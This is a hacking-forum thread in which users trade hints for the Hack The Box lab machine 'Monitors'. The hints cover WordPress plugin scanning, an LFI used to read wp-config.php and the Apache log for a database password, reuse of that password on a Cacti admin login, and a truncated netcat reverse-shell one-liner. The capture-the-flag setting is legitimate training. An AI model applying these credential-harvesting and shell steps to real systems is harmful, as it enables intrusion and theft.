TUTORIAL Monitors - Hackthebox
by sanakasa - April 24, 2021 at 09:28 PM
#1
This is the thread to talk about what we have from the new hackthebox machine Monitors. Let's gooooooooo
Reply
#2
LFI - RFI and got passwd but stuck
Reply
#3
1) Find the vulnerable plugin:
wpscan --url http://monitors.htb/ -e ap,t,tt,u

2) Use this CVE for RFI/LFI (Spritz 1.0)
https://www.exploit-db.com/exploits/44544
Reply
#4
i think we're all at same spot, rfi seems to semi work but wont execute a php payload, anyone know where it might store the file once it dls?
Reply
#5
* Use LFI mentioned above to read /var/www/wordpress/wp-config.php (view source)
* Get WP database password '[email protected]!'
* Use LFI to include /proc/self/fd/10 to get the apache access log.
* From the access log, see new vhost 'http://cacti-admin.monitor.htb' - add this to your hosts
* Use WP database password to log in to Cacti as admin user.
* ???
* profit
Reply
#6
i can read user.txt but hackthebox says it is wrong.

`cat /home/marcus/user.txt`
Reply
#7
(April 24, 2021 at 11:23 PM)bosbayt Wrote: i can read user.txt but hackthebox says it is wrong.

`cat /home/marcus/user.txt`

Do you mind sharing how you get foothold from cacti?
Reply
#8
trying to find how to read files from sqli, seems like cant make files, unless im getting the /tmp path wrong when looking for it
Reply
#9
got user, now to figure out this note
Reply
#10
https://github.com/Cacti/cacti/issues/3622
Reply
#11
(April 25, 2021 at 08:39 AM)Jockerjock Wrote: https://github.com/Cacti/cacti/issues/3622

Been trying this for a while. I know it works, but haven't been able to get a payload that does anything
Reply
#12
(April 25, 2021 at 08:46 AM)airspitter Wrote:
(April 25, 2021 at 08:39 AM)Jockerjock Wrote: https://github.com/Cacti/cacti/issues/3622

Been trying this for a while. I know it works, but haven't been able to get a payload that does anything

Try nc reverse shell


rm /tmp/f;mkfifo /tmp/f.....
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Monitors: root part for free siracuso 26 3,563 May 01, 2021 at 08:56 AM
Last Post: hhy
TUTORIAL Monitors HTB Detailed Writeup 0xmahesh 0 855 April 29, 2021 at 03:27 PM
Last Post: 0xmahesh
TUTORIAL Monitors Detailed Writeup Jockerjock 1 831 April 29, 2021 at 03:23 PM
Last Post: 0xmahesh

 Users browsing this thread: 2 Guest(s)